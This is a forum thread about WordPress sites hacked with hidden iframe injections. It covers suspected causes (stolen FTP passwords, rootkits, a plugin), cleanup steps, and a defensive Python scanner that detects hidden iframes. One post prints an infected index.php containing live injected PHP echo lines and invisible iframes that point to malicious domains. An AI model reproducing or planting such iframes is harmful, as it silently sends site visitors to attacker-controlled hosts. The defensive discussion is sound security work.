Just had a WordPress site of mine that was hacked earlier this morning, had an iframe directing to lotultimatebet.cn inserted in the main *.php files throughout the site.
Has anyone else experienced this? And does anyone know how to protect against whatever attack was used?
To guarantee that you won’t get hacked, always use the latest version of WordPress, only use plugins, scripts and themes which you trust, and use a secure password for your WordPress admin, your database and your FTP. Just out of interest, what is the URL for your site?
I had the same thing. I am using WP 2.5.1 on the site. When upgrading to 2.7.1 I ran into problems on another site, so I didn’t upgrade yet.
In fact the one with 2.7.1 has been hacked too. I can’t even get back into the back-end at the moment.
Be aware joeyconnick that you could possibly have a rootkit installed on your system.
I’ve recently had issues with sites that I develop, albeit .Net sites, also hacked and injected with same/similar iframe code. An example below…
I believe that my system was compromised with a rootkit, and access details to the sites I manage were retrieved for the express interest of further propagating the rootkit. I say this because AVG picked up the presence of rootkit activity after I viewed an infected page.
In regards to how I was compromised… I was not surfing inappropriate material, nor executing unknown files… I think it’s probably a Firefox exploit… more than likely on an add-on. Good Luck.
Thanks for the info, bsains. I doubt it’s a rootkit on my system but it might be one on the system of my friend whose blog it is. She’s the one who usually interacts with it.
We were also advised it might have been a brute-force attack against her FTP password.
Yeah, the injected iframe stuff for us was the lotultimatebet site.
I’ll see if her anti-virus software has rootkit detection.
This is not a WordPress exploit. Most likely FTP password is compromised.
I’ve just covered this particular exploit in my blog.
- Scan local computers for viruses and spyware
- Change FTP passwords
- Upload clean content from a backup
For the future:
1. Change your database prefix:
2. Change username from admin to something else
3. Install the following plugins:
-apache password protect:
-wordpress security scan:
4. Disable ping response (ICMP) on your server (if you have the rights), this will prevent some DOS attacks:
Here is what appears in my index.php file
```php
<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');
echo "<iframe src=\"http://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
<iframe src="http://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>
```
What should I do now… All my blogs have been similarly hacked, even non-wordpress domains
The income .cn iframes are not even PHP-related. They are added at the bottom of files like index.html, index.php, etc.
The xtrarobotz/nipkelo/internetcountercheck hack is more sophisticated – it injects PHP-code. I didn’t investigate it, but since they usually appear on the same sites as the income .cn iframes, I assume the same compromised passwords are used.
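The two injection styles described in the post above (hidden iframes appended as raw markup, and iframes emitted by injected PHP `echo` lines) can be searched for across a web root with a small scanner. This is an added example, not part of the original thread; the `.example` hosts and the sample file are constructed, and the function names are illustrative.

```python
import re
import sys
from pathlib import Path

# Opening iframe tag; [^>]* also covers the PHP-echoed form with \" quotes.
IFRAME = re.compile(r'<iframe\b[^>]*>', re.I)
# Signs that a frame is meant to be invisible: 0/1-pixel size or CSS hiding.
TINY = re.compile(r'\b(?:width|height)\s*=\s*\\?["\']?[01](?:px)?\b', re.I)
HIDDEN = re.compile(r'visibility\s*:\s*hidden|display\s*:\s*none', re.I)
SRC = re.compile(r'src\s*=\s*\\?["\']?([^\s"\'\\>]+)', re.I)
EXTENSIONS = {'.php', '.html', '.htm'}

# Constructed sample (placeholder hosts), modelled on the index.php posted above.
SAMPLE = (
    "<?php\n"
    "define('WP_USE_THEMES', true);\n"
    'echo "<iframe src=\\"http://injected.example/?click=X1\\" width=1 height=1 '
    'style=\\"visibility:hidden;position:absolute\\"></iframe>";\n'
    "?>\n"
    '<iframe src="http://injected.example/in.cgi?a1" width=1 height=1 '
    'style="visibility: hidden"></iframe>\n'
    '<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>\n'
)

def find_hidden_iframes(text):
    """Return (line_number, src, kind) for every invisible iframe in text."""
    hits = []
    for m in IFRAME.finditer(text):
        tag = m.group(0)
        if not (TINY.search(tag) or HIDDEN.search(tag)):
            continue  # normally sized, visible embed: not reported
        before = text[:m.start()]
        # Inside an open <?php block means injected PHP; otherwise raw markup.
        in_php = before.rfind('<?php') > before.rfind('?>')
        src = SRC.search(tag)
        hits.append((before.count('\n') + 1, src.group(1) if src else '',
                     'php-echo' if in_php else 'raw-html'))
    return hits

def scan_tree(root):
    """Scan .php/.html/.htm files under root; return {path: hits} for findings."""
    report = {}
    for path in Path(root).rglob('*'):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits = find_hidden_iframes(path.read_text(errors='replace'))
            if hits:
                report[str(path)] = hits
    return report

if __name__ == '__main__':
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else '.').items():
        print(*(f'{path}:{n}: hidden iframe ({k}) -> {s}' for n, s, k in hits), sep='\n')
```

A clean result only means this particular pattern is absent; files should still be compared against a known-good backup, as the cleanup steps earlier in the thread suggest.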
We got hacked when we installed this WordPress plug-in: Make Tabbloid. We believe it takes advantage of the PDF creation tool and therefore allowed the hacker to gain access.
Does anyone have a plugin which automatically sends an alert to the owner’s email address if someone tries a wrong password on our blog, or have another kind of instant notification? That would also be helpful. What do you guys think?
My website was also hacked this week and I’ve been spending the last two days fixing it. I think I finally got it resolved. They injected links into a lot of the theme files and then iframe injections into some posts. It was really weird. I removed the admin user, changed the passwords, and added a lot of plugins that were suggested in this blog: http://www.aboutonlinetips.com/wordpress-security-plugins/
- The topic ‘WordPress hacked’ is closed to new replies.